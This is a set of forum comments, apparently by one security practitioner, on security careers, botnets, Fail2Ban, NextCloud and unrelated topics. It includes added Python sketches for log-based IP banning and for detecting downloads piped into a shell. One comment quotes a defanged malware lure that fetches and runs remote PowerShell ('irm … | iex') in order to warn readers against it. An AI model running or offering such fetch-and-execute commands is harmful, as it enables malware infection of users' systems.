

Did anyone have a bet on “Polymarket gets hacked?” Time to cash in.




Just to set the table, I’ve been working in IT for around 25 years. I’ve spent time at help desk, systems administration and cybersecurity. I’m now in a senior technical position, having managed to avoid being a people manager by dint of being a good enough technical worker and an honest conversation with my own managers telling them I do not want to be a manager. I don’t actually have a degree, but that’s a choice I would NOT recommend to anyone. Especially in today’s world with every paper mill churning them out. I also am regularly part of the interview and hiring process for cybersecurity hires at my current company and previous ones as well. Yes, my unedu-macated arse is involved in the decision of whom to hire.
My advice for anyone looking at Cybersecurity as a career path would be “it depends”.
If you want to be on the technical side of things, I’d argue for the Computer Science degree. If you can, take some of the Cyber Security classes as electives, but the main focus should be on understanding how systems and programs work. One of the reasons I’m able to avoid management duties is that I have a rather deep understanding of how IT and systems work. And I can usually figure out the new stuff pretty fast. Much of that comes from my own learning about systems and programming.
If you are more interested in the auditing and compliance side of cybersecurity, then the Cyber Security degree is likely to be more useful. The folks in compliance need to have a solid foundation in the language of compliance models and dealing with the “joys” of audits. They usually aren’t going to be the folks digging into the deep technical details, but they do need to know enough to ask the right questions when a program manager starts trying to bullshit them about why a high criticality security control is “N/A”. And they need to understand why that control is important. The folks I’ve interviewed with Cyber Sec degrees seem to have this sort of thing down.
No matter which way you go, I’d highly recommend getting some time in traditional IT. The folks we have been hiring usually have a career path kinda similar to my own: some background in IT (often a year or three at hell desk and possibly time as a sysadmin) followed by a move into cybersecurity. We do have a couple junior folks who didn’t spend time in IT and they tend to have odd gaps in their knowledge which hold them back. We really want people whom we don’t have to explain to what an ARP table is and why you might want to pull one from a switch. Build some systems and get a grasp on why the sysadmins might make some of the choices they do. Walking a mile in the shoes of IT can really help you make sense of the alerts they generate.
Lastly, I’d give the MSc a miss for the time being and go get some experience. There is nothing quite like being in the trenches to really put the pieces together in your mind and understand why organizations might make the choices they make. Security is almost never job #1 and that leads to a lot of compromises. Learning to feel those out and communicate with folks who don’t want to do things “the right way” is an important skill. And it’s not one you’re going to learn from a book. That said, if you do have room during your degree to take a public speaking course, take it. Especially as a senior technical leader, I do a lot of speaking to people. I have directors and C-level folks randomly asking me questions. And I spend a lot of time in meetings and on calls with IT and business folks. While it’s very true that “Hell is other people”, you’re gonna spend a lot of time in that fire.
Once you have a few years in, that’s the time to get the MSc. Especially if you want to move onto management track. At that point, go get a higher degree in Business Administration. Unless your goal is in research or teaching, a higher degree in either CS or Cyber is basically a waste. Once you are far enough along the technical track, companies are looking at experience. Sure, the higher degree might be a differentiator if you are up against similarly skilled folks. But that becomes less of an issue the further you go. I don’t think I have been asked about my lack of a degree in an interview in the last decade. No one cares when you can talk to all the issues they are looking to hire you for.
No matter what you choose, never stop learning. This is a career where what you learned ten years ago is both completely irrelevant and also oddly relevant. Some of my earliest time at a computer was learning to program in BASIC. And while that’s not something I ever expect to do again, I still see patterns I learned from that all over the place today. So, keep learning, even after you get handed that fancy bit of paper. It’s both fun and pays dividends in this field.


This is a good reminder that the “S” in “Meta” stands for “Security”.


All of the above.
Is it that ISPs are being paid by tech-bros to assign them these IPs?
Bullet Proof Hosting is a thing. Some ISPs basically advertise to criminals about their ability to evade take down orders and unwillingness to work with law enforcement. So, some infrastructure ends up on these devices. However, the IP ranges from these services often get discovered and are added to public reputation and block lists.
Alongside this, cloud providers are pretty bad about policing their networks. On my own home server, I have blocked much of the Digital Ocean IP space, as it’s home to a lot of scanners, bots and other malicious traffic.
Is it that residential devices have been hacked / contain malware that does this?
This happens, a lot. The Mirai Botnet thrived on compromised home routers. People are pretty bad at updating their devices and many SOHO routers ship with some pretty bad vulnerabilities. It’s only a matter of time until someone finds an unpatched or misconfigured router and adds it to a botnet. People also get phished or install trojans all the time, adding to botnets. Darknet Diaries just had a fantastic episode on the Bayrob malware, part of which was turning infected machines into a custom botnet.
Is it trivial for companies to assign themselves residential IPs?
Some ISPs just look the other way when they get reports of malicious activity on their network. Also, attackers can force a DHCP refresh and just get a new IP when the old one seems blocked. Getting one in the first place is often as simple as signing up for service and/or compromising someone’s home PC and using it as a relay.
Paid volunteers are doing this for AI companies?
This probably happens. After all, we’ve already seen a company selling an AI product which was just workers in India.
Obviously this is a problem because one can rotate / cycle through residential IPs and if I aggressively block each offender in my logs permanently, then the next person assigned this IP who may be a legitimate user will be unable to access my site.
Look into Fail2Ban. This program monitors your logs and will ban IPs automatically based on criteria you set. This can include specific HTTP requests in your web logs. The ban can be permanent or can be time limited. For example, I have a container running in a cloud provider which I use to proxy requests through my ISP’s CGNAT setup. There is an nginx reverse proxy running there and I have fail2ban watching the access log. If certain request strings are seen, the sending IP gets dumped in a permanent jail. I also have it scanning the sshd logs and banning IPs which fail to login 3 times within a short period.
It’s far from a silver bullet, but it’s something which should be running on any web facing system. Attackers will always be rattling the door knobs. There is no reason to let them keep rattling away.
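The two rules described in this comment, sketched as an added example (not the commenter's configuration and not Fail2Ban's own code): one probe request in the web log earns a permanent ban, while three failed SSH logins inside a window earn a ban that expires, so a recycled residential IP is not locked out forever. The probe paths, the 10-minute window, the 1-hour ban, the ISO-timestamp syslog format and all log lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (documentation-range addresses), not real traffic.
NGINX_LOG = [
    '203.0.113.7 - - [01/Mar/2025:10:00:00 +0000] "GET /.env HTTP/1.1" 404 153 "-" "-"',
    '198.51.100.20 - - [01/Mar/2025:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "-"',
]
SSHD_LOG = [
    f"2025-03-01T10:0{i}:00 host sshd[811]: Failed password for root from 192.0.2.44 port 40122 ssh2"
    for i in range(3)
] + ["2025-03-01T10:00:30 host sshd[812]: Failed password for invalid user admin from 198.51.100.20 port 5022 ssh2"]

NGINX = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (?P<path>\S+)')
# Greedy ".*" binds to the last " from <ip> port", so text in the username cannot spoof the address.
SSHD = re.compile(r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Failed password for .* from (?P<ip>\S+) port")
PROBE_PATHS = ("/.env", "/wp-login.php", "/cgi-bin/")  # assumed request strings
MAX_RETRY = 3                        # three failed logins, as in the comment
FIND_TIME = timedelta(minutes=10)    # "a short period" (assumed value)
SSH_BAN = timedelta(hours=1)         # time-limited ban (assumed value)
PERMANENT = datetime.max             # expiry used for the permanent jail


def scan(nginx_lines, sshd_lines):
    """Apply both rules and return {ip: time the ban expires}."""
    bans, failures = {}, defaultdict(deque)
    for m in filter(None, map(NGINX.match, nginx_lines)):
        if m["path"].startswith(PROBE_PATHS):
            bans[m["ip"]] = PERMANENT              # one probe request is enough
    for m in filter(None, map(SSHD.match, sshd_lines)):
        ts, recent = datetime.fromisoformat(m["ts"]), failures[m["ip"]]
        recent.append(ts)
        while ts - recent[0] > FIND_TIME:          # drop failures outside the window
            recent.popleft()
        if len(recent) >= MAX_RETRY:
            # never shorten an existing (possibly permanent) ban
            bans[m["ip"]] = max(bans.get(m["ip"], ts), ts + SSH_BAN)
    return bans


def is_banned(bans, ip, now):
    """True while the ban for ip has not yet expired."""
    return now < bans.get(ip, datetime.min)
```
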


Thanks for sharing.
But, please stop using the curl command piped into a terminal pattern. Malicious actors have been abusing the fuck out of this pattern ever since the idiots at Anthropic decided that would be the official install pattern for Claude. I’ve been cleaning up infections based on people just blindly running shit like that constantly over the last couple months.
Folks, never run a random script from the internet without being sure what you are actually about to run. If using AUR packages is considered risky, random scripts being piped into a terminal rank right up there with sticking your dick in a blender.
There is a reason I always say, “backslash, the one without the question mark”.


Looks like a large segment of the Lemmy user base needs to patch.


You’d expect it to happen ~5% of the time on a fair die. But, I’d be willing to bet a lot of dice aren’t actually fair and so the results get weighted.


The just stopped working was the client stopped syncing?
The client doesn’t seem to detect new photos as they are created/taken. If I manually upload an image from my photos folder, it syncs just fine. Files in other folders seem to sync just fine. But, photos and videos just never even try to sync.
NextCloud decided to stop allowing privately made certificates with its client in 2025 and it’s what made me switch.
This hasn’t been an issue for me. I pay for a domain and have a certificate issued by Let’s Encrypt. The only certificate errors I get are when I refresh the certificate every 6 months, and that’s just the client asking me if I want to trust the new certificate.
Syncthing
I had looked into this a while back, but it seemed to be more of a point to point solution and not a client-server system. I was aiming to have an authoritative server with everything and clients (both phone and desktop) able to pull the needed/requested files. I also like the ability to share via a web link when needed. Am I wrong in that understanding?


I currently use NextCloud, but I have been looking to move away from it. My main use case is for syncing photos and videos to the cloud from my phone (Android) and this used to work flawlessly. But, some time in early 2025, it just stopped working. I can still manually upload files and sync still works for other folders (e.g. Documents) just fine. But, photos and videos just won’t sync automatically. Not sure if there are other options which would work better, but NextCloud on Android just seems to be broke.


So, they paid the attackers. Sure, the attackers may not sell or dump the data publicly, but you can bet your arse that they have a copy and will use it in future phishing campaigns or other scams.


Jumping over to the original report:
While the canonical command is “irm https[:]//claude[.]ai/install.ps1 | iex”, the lure replaced the destination host with “irm events[.]msft23[.]com | iex”.
Whatever artificially intelligent person at Anthropic decided that the official install method for Claude Code should be an irm piped to an iex in PowerShell should be dragged out behind the same woodshed as Old Yeller. That is basically screaming “malicious code” at security tools. And it’s training developers that blindly running code from the internet is a-ok. It’s no wonder I’ve already seen exactly this sort of thing (with a different URL) happen in my environment. It’s like the AI companies are trying to make security worse.
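A detection-side view of this comment and of the earlier one about piping curl into a terminal, as an added example (not code from the report or from any vendor): it flags command lines where a downloader feeds an interpreter directly and pulls out the host, since the legitimate command and the lure differ only there. The allowlist, host names and sample command lines are constructed; the argument parsing is a heuristic.

```python
import re
from urllib.parse import urlsplit

# A downloader piped directly into an interpreter: curl/wget into a shell, or
# PowerShell's irm/iwr (Invoke-RestMethod/Invoke-WebRequest) into iex.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget|irm|iwr|invoke-restmethod|invoke-webrequest)\b"
    r"(?P<args>[^|]*)\|\s*(?:sudo\s+)?(?:sh|bash|zsh|iex|invoke-expression)\b",
    re.IGNORECASE,
)
EXPECTED_HOSTS = {"install.example.com"}  # hypothetical allowlist of vendor hosts

# Constructed command lines, as a process-creation log might record them.
SAMPLES = [
    'powershell -c "irm https://install.example.com/install.ps1 | iex"',
    'powershell -c "irm updates.example.net | iex"',
    "curl -fsSL https://get.example.org/setup.sh | sudo bash",
    "curl -fsSLO https://install.example.com/install.sh",
]


def fetched_host(args):
    """Return the host of the first URL-like argument (heuristic), or None."""
    for tok in args.split():
        tok = tok.strip("\"'")
        if tok.startswith("-") or "." not in tok:
            continue                      # skip flags and plain words
        if "://" not in tok:
            tok = "https://" + tok        # the lure quoted above uses a bare host name
        return urlsplit(tok).hostname
    return None


def classify(cmdline):
    """None if no pipe-to-shell; otherwise (host, 'expected' or 'unexpected')."""
    m = PIPE_TO_SHELL.search(cmdline)
    if not m:
        return None
    host = fetched_host(m["args"])
    return host, ("expected" if host in EXPECTED_HOSTS else "unexpected")


def triage(cmdlines):
    """Command lines that pipe a download from a host outside the allowlist."""
    hits = []
    for cmd in cmdlines:
        verdict = classify(cmd)
        if verdict and verdict[1] == "unexpected":
            hits.append(cmd)
    return hits
```

Every "expected" result is still unreviewed remote code being executed; the allowlist only ranks alerts, and it is exactly the noise an official pipe-to-interpreter installer creates.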


GM is also required to:
- Stop selling driving data to consumer reporting agencies and brokers for five years.
Stop doing that until everyone forgets about it and we can go back to turning a blind eye.


This is a bit over-wrought. The important question this article doesn’t deal with is: what are those FTP servers hosting? If it’s anything which should be secured, that is a problem. But, if all it is, is a public file repository, then the extra complexity of SFTP or FTPS probably isn’t worth the trouble. My current company has an FTP server which is exactly this. It hosts product documentation and is meant to be public. While they probably should have moved on and just dumped all of it in an S3 bucket with public read, the FTP server is what our customers know and have used for decades. If it ain’t broke and the security isn’t a problem, it’s not really a priority.

I must have gotten one after the enshittification. I bought a HiSense TV during the pandemic and the unit I got was trouble from nearly day 1. A line of pixels went dead all the way across the screen. I tried to work with their warranty department and they asked for a picture of the problem.
Ok, easy enough. Take the picture and send. They reply, “can you take a picture with better lighting of the bezel?” Ok, no problem. Get better lighting, snap picture, send off. They reply, “can you get better lighting on the bezel?” Seriously? Fine, get the TV under really good lighting, take picture, send. “Can you get better lighting on the bezel?” WTF? Ok, I’ll admit I don’t have 50,000 candle power spot lights on it, but this is just obvious stalling. Each round of pictures and request for more is taking weeks.
During this time, the TV OS sees several updates and the underpowered nature of the system is starting to slow. The menus aren’t just sluggish, they are downright unusable. The home screen is now half ads. I finally decided, “fuck it”, took the TV to the dump and bought something else.
Thankfully, the TV was only around $500. Not cheap, but the cost of the education in not buying crap didn’t hurt too much.
tl;dr: Fuck HiSense


AI Slop code base. Did Microsoft go open source?


Let’s ignore the pedantic issues of “there is no surface”, “there is no sun to rise” or “you’d be dead so insanely fast you probably wouldn’t notice”. Assuming you were magically teleported and held protected just above the event horizon of a black hole, it would be so bright you’d go blind almost instantly. Not because of any star coming over the horizon, but because the accretion disk would just be that bright. If you look at NASA’s pictures of M87, you aren’t actually seeing the black hole. There’s nothing there to see. Instead, what you are seeing in the pictures is the accretion disk around the black hole. As matter gets closer to the event horizon, it accelerates and all that stuff starts bumping into each other. At the energies involved, this produces electromagnetic radiation of basically every energy. There is infrared right up through x-ray, including lots and lots of visible light. And this is happening on a scale which is so mind-bogglingly big that words really just fail to capture it. Here is an artistic representation with our solar system for scale. Pluto’s orbit would be well inside the event horizon. There is an insane amount of light and energy in that accretion disk. And thanks to the black hole warping light around itself, you would be getting bombarded by its energy from every angle, including the disk on the opposite side of the black hole. In short, it would be really bright.


If we’re aiming more towards realism, there are many reasons no modern military fields anything which looks like a mech. Not the least of which is tall, thin objects stick out on a battlefield and become targets. If you want an armored vehicle with a big gun, you build it low to the ground and end up with a tank. More survivability usually boils down to two factors:
You don’t die if you don’t get shot, and if you do get shot at you really, really want to prevent whatever hit you from penetrating in and killing the crew and/or disabling the vehicle.
Mechs with spindly legs end up high above the ground and those legs become obvious targets given the complexity of making a leg work. You’d want to reduce the height, meaning shorter legs. Then you want to not have something as horridly complex as an actuating knee or hip. So, let’s just use a tracked drive or wheel instead. As for the top, why arms? Again, too much complexity, just a single rotating turret would be simpler and easier to shield. That head thing can be reduced to a sensor mast and we’ll just make the sensors omnidirectional to avoid the whole “make it spin” complexity. And um, we just built a tank. Sure, there is some advantage to walking vehicles, and they might make sense on a small scale or in support roles where they are much less likely to come under fire. But for a front-line armored vehicle, I’d buy tanks.
At the same time, mechs look cool.


You could try using Autopsy to look for files on the drive. Autopsy is a forensic analysis toolkit, which is normally used to extract evidence from disk images or the like. But, you can add local drives as data sources and that should let you browse the slack space of the filesystem for lost files. This video (not mine, just a good enough reference) should help you get started. It’s certainly not as simple as the photorec method, but it tends to be more comprehensive.


Given how often it pops up in Office applications now, I just refer to it as “clippy”.